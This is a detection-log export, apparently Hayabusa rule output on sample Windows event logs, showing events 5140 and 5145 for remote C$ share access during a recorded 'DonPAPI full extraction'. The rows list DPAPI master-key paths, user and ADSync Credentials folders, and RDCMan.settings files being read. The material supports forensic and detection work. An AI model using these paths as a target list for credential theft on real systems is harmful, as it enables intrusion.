+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.833 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.833 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.865 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
07:15:59.865 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.896 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.896 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.927 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.927 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.958 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
07:15:59.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.977 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.978 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.997 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.997 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.034 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.037 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.039 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.054 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.054 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.623 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.638 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.654 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 